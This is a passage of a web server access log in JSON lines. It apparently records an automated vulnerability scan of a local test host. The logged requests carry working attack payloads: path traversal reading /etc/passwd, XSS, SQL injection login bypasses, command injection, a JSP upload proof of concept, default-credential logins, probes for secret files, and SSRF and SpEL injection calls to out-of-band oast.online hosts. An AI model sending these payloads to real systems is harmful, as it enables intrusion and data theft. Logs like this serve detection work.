HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"297MFtftbFLa5vkoWZpqc4dSqBv.tld","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /remote/login?&err=--%3E%3Cscript%3Ealert('297MFlGAKBjXm1zcuxs96jxwaqL')%3C/script%3E%3C!--&lang=en HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /gespage/webapp/login.xhtml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /includes/dompdf/dompdf.php?input_file=dompdf.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /AirWatch/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/search/*:test=test HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.composer/composer.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"{\x22methodInput\x22:[{\x22type\x22:\x22ClusterComputeResource\x22,\x22value\x22: null,\x22serverGuid\x22: null}]}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"op=login&username=admin|pwd&password=123456","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PURGE / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"PURGE", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"ccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password=nuclei","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apply_sec.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"USERNAME=%27%29or%601%60%3D%601%60%3B--+-&PASSWORD=A&language=en&log=\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /account/index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger-ui/api-docs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"------WebKitFormBoundaryFy3iNVBftjP6IOwo\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x22poc.jsp\x22\x0D\x0AContent-Type: application/octet-stream\x0D\x0A\x0D\x0A<%out.print(2be8e556fee1a876f10fa086979b8c7c);%>\x0D\x0A------WebKitFormBoundaryFy3iNVBftjP6IOwo--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /page/exportImport/uploadOperation.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WCC2/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?post_type=post&s=%22%3E%3Cscript%3Ealert(/297MFjBoSco04W2054DGGEAz94X/)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /SSI/Auth/ip_snmp.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"username=admin&password=geoserver","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /geoserver/j_spring_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_drawroot&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/targets HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plesk-stat/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zabbix/zabbix.php?action=dashboard.list HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /vendor/composer/installed.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.msmtprc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /main/blank?message_success=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"USERNAME=%27%29or%601%60%3D%601%60%3B--+-&PASSWORD=A&language=en&log=\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /opensis/index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/api-docs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /standard/default.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"html_response_page=%2Flogin_pic.asp&login_name=YWRtaW4%3D&log_pass=bnVjbGVp&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apply_sec.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /page/exportImport/fileTransfer/poc.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets/app/something/services/AppModule.class/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /register/toDownload.do?fileName=../../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /include/thumb.php?dir=http\x5C..\x5Cadmin\x5Clogin\x5Clogin_check.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wpdmpro/list-packages/?orderby=title%22%3E%3Cscript%3Ealert(1)%3C/script%3E&order=asc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /s3cmd.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?u=http://c9v8gc8smpv8b0ng0t00y34k43gqaih4x.oast.online/&href=http://c9v8gc8smpv8b0ng0t00rdnf6iwkgbfdo.oast.online/&action=http://c9v8gc8smpv8b0ng0t00uf8brddxeqawm.oast.online/&host=c9v8gc8smpv8b0ng0t005q4u8p1pprfoj.oast.online&http_host=c9v8gc8smpv8b0ng0t00nukp3zk3d195c.oast.online&email=root@c9v8gc8smpv8b0ng0t00ofe5syx6t8zas.oast.online&url=http://c9v8gc8smpv8b0ng0t00m4q9ox5kc5iay.oast.online/&load=http://c9v8gc8smpv8b0ng0t00ecwws6rgndt36.oast.online/&preview=http://c9v8gc8smpv8b0ng0t00m9rotrd61cnwk.oast.online/&target=http://c9v8gc8smpv8b0ng0t00c65nagm3iwdod.oast.online/&proxy=http://c9v8gc8smpv8b0ng0t00g68sq6ogqmcxz.oast.online/&from=http://c9v8gc8smpv8b0ng0t00jsee1ktcpohsj.oast.online/&src=http://c9v8gc8smpv8b0ng0t00nnseuypsizkac.oast.online/&ref=http://c9v8gc8smpv8b0ng0t00g6aok9rf58pxg.oast.online/&referrer=http://c9v8gc8smpv8b0ng0t00ct5ins5ybko4z.oast.online/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"{\x0D\x0A \x22predicates\x22: [\x0D\x0A {\x0D\x0A \x22name\x22: \x22Path\x22,\x0D\x0A \x22args\x22: {\x0D\x0A \x22_genkey_0\x22: \x22/297MFmXlda6ZnaLI60N943VdOWq/**\x22\x0D\x0A }\x0D\x0A }\x0D\x0A ],\x0D\x0A \x22filters\x22: [\x0D\x0A {\x0D\x0A \x22name\x22: \x22RewritePath\x22,\x0D\x0A \x22args\x22: {\x0D\x0A \x22_genkey_0\x22: \x22#{T(java.net.InetAddress).getByName(\x5C\x22c9v8gc8smpv8b0ng0t00n1pyt5fu9rotw.oast.online\x5C\x22)}\x22,\x0D\x0A \x22_genkey_1\x22: \x22/${path}\x22\x0D\x0A }\x0D\x0A }\x0D\x0A ],\x0D\x0A \x22uri\x22: \x22http://127.0.0.1\x22,\x0D\x0A \x22order\x22: 0\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /actuator/gateway/routes/297MFmXlda6ZnaLI60N943VdOWq HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /view/viewer_index.shtml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"USERNAME=%27%29or%601%60%3D%601%60%3B--+-&PASSWORD=A&language=en&log=\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"{\x22name\x22:\x22admin\x22,\x22password\x22:\x22admin\x22,\x22checkbox\x22:false}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login/system HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /main/blank?message_error=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cf_scripts/scripts/ajax/package/cfajax.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/apidocs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"------WebKitFormBoundaryl7d1B1aGsV2wcZwF\x0D\x0AContent-Disposition: form-data; name=\x22id\x22\x0D\x0A\x0D\x0A%{\x0D\x0A(#request.map=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\x0D\x0A(#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) +\x0D\x0A(#request.map2=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\x0D\x0A(#request.map2.setBean(#request.get('map').get('context')) == 